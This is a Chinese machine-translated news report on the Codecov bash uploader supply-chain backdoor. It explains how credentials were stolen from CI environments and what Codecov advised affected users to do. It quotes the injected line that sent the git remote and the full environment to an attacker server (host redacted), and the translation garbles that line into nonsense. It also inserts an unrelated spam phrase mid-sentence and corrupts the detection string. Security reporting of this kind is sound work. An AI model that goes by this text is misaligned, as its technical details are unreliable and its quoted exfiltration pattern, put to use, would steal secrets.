一个公开可用的软件开发工具包含了恶意代码，这些代码窃取了应用程序访问敏感资源所需的身份验证凭证。这是一场供应链攻击的最新爆料，该攻击有可能使无数组织的网络进入后门。

Codecov bash上传器的开发者周四表示，从1月底到4月初，它包含了这个后门。这种后门导致开发人员的计算机向黑客控制的远程站点发送秘密身份验证令牌和其他敏感数据。上传者与包括Github Actions、CircleCI和Bitrise Step在内的开发平台一起工作，所有这些平台都支持在开发环境中拥有这样的秘密身份验证令牌。

一堆AWS和其他云证书

Codecov bash上传器为大型软件开发项目执行所谓的代码覆盖。它允许开发人员发送覆盖率报告，其中，确定有多少代码库已经被内部测试脚本测试。一些开发项目将Codecov和类似的第三方服务集成到他们的平台中，在那里可以免费访问敏感的凭证，这些凭证可以用来窃取或修改源代码。

类似于这一行的代码首次出现在1月31日:

旋度sm 0.5 - d”(git远程- v) < < < < < < ENV (ENV)美元“https:///upload/v2 | |真的

代码将GitHub存储库的位置和整个过程环境发送到远程站点，Codecov表示，这是正在进行的联邦调查的一部分，沐鸣开户测速因此已经进行了编辑。这些类型的环境通常在Amazon Web Services或GitHub中存储软件的令牌、凭证和其他秘密。

网络发现平台Rumble的首席执行官、安全专家HD Moore表示，有了这些秘密，攻击者就可以对依赖该工具的开发环境做很多恶意的事情。

他在与Ars的直接信息中写道:“这真的取决于环境中的内容，但从攻击者能够访问(通过bash上传程序)的角度来看，他们可能已经能够在运行的系统上植入后门。”“对于GitHub/CircleCI来说，这将主要暴露源代码和证书。”

摩尔继续说:

攻击者最终可能会得到一堆AWS和其他云证书，此外还有令牌，这些令牌可以让他们访问私有存储库，其中包括源代码，以及令牌授权使用的所有其他东西。在极端情况下，这些凭证会自我永久保存——攻击者使用偷来的GitHub令牌窃取源代码，然后窃取下游客户数据等。这同样适用于AWS和其他云凭据。如果凭据允许，它们可以启用基础设施接管、数据库访问、文件访问等。

Codecov在周四的公告中说，bash上传程序的恶意版本可以访问:

我们的客户通过其CI(持续集成)运行程序传递的任何凭证、令牌或键，在执行bash上传器脚本时都可以访问这些凭证、令牌或键

可以使用这些凭据、令牌或键访问的任何服务、数据存储和应用程序代码

使用bash上传器将存储库的覆盖率上传到CI中的Codecov的git远程信息(原始存储库的URL)

“根据迄今为止的法医调查结果，似乎从2021年1月31日开始，谷歌云存储(GCS)密钥定期受到未经授权的访问，它允许恶意的第三方修改我们的bash uploader脚本的一个版本，从而可能导出信息，以便持续集成到第三方服务器，”Codecov说。“Codecov于2021年4月1日确保并修改了脚本。”

Codecov顾问说，Codecov的Docker图像创建过程中的一个bug允许黑客提取修改bash上传脚本所需的凭证。

4月1日，一名客户发现了篡改，他注意到充当确认bash上传程序完整性的数字指纹的shasum与从https://codecov.io/bash下载的版本的shasum不符。客户联系了Codecov，工具制造商撤下了恶意版本并开始调查。

Codecov敦促在受影响期间使用bash更新器的任何人撤销CI进程中的所有凭据、令牌或密钥，并创建新的凭据、令牌或密钥。开发人员可以通过在CI管道中运行env命令来确定哪些键和令牌存储在CI环境中。任何敏感的东西都应该被认为是妥协的。

此外，任何使用本地存储的bash上传程序版本的人都应该检查它，沐鸣开户测速以获取以下信息:

$(git remote -v) $(git remote -v)

如果这个命令出现在本地存储的bash上传程序中的任何地方，用户应该立即用来自https://codecov.io/bash的最新版本替换上传程序。

Codecov说，使用自托管版本的bash update的开发人员不太可能受到影响。要受到影响，你的CI管道将需要从https://codecov.io/bash获取bash上传器，而不是从你自己托管的Codecov安装。您可以通过查看CI管道配置来验证从哪里获取bash上传程序。”

供应链攻击的吸引力

Codecov的软件开发和分销系统的泄露是最新曝光的供应链攻击事件。去年12月，类似的妥协也打击了SolarWinds。这家位于德克萨斯州奥斯汀市的网络管理工具制造商被全球约30万家机构使用，其中包括财富500强公司和政府机构。

实施攻击的黑客随后发布了一个后门更新，约1.8万名用户下载了该更新。大约10家美国联邦机构和100家私营公司最终收到了后续有效载荷，将敏感信息发送到攻击者控制的服务器。FireEye、微软、Mimecast和Malwarebytes都被卷入了这场战役。

最近，黑客对软件供应链进行了一次攻击，用来在使用NoxPlayer的用户的电脑上安装监控恶意软件。NoxPlayer是一款在个人电脑和mac电脑上模仿Android操作系统的软件包，主要是为了让用户在这些平台上玩手机游戏。ESET的研究人员表示，NoxPlayer的后门版本已经上市5个月了。

对黑客来说，供应链攻击的吸引力在于其广度和有效性。通过损害软件供应中的一个主要参与者，黑客可以潜在地感染使用该产品的任何个人或组织。黑客发现的另一个有利特性是:目标通常很少或根本无法检测以这种方式传播的恶意软件，因为数字签名将表明它是合法的。

然而，在bash后门更新版本的情况下，Codecov或其任何客户只要检查shasum就可以很容易地检测到恶意。恶意版本能够逃脱三个月的注意，这表明没有人费心执行这种简单的检查。

在1月31日到4月1日期间使用过bash更新程序的人应该按照周四的建议中概述的步骤仔细检查他们的开发构建，以寻找妥协的迹象。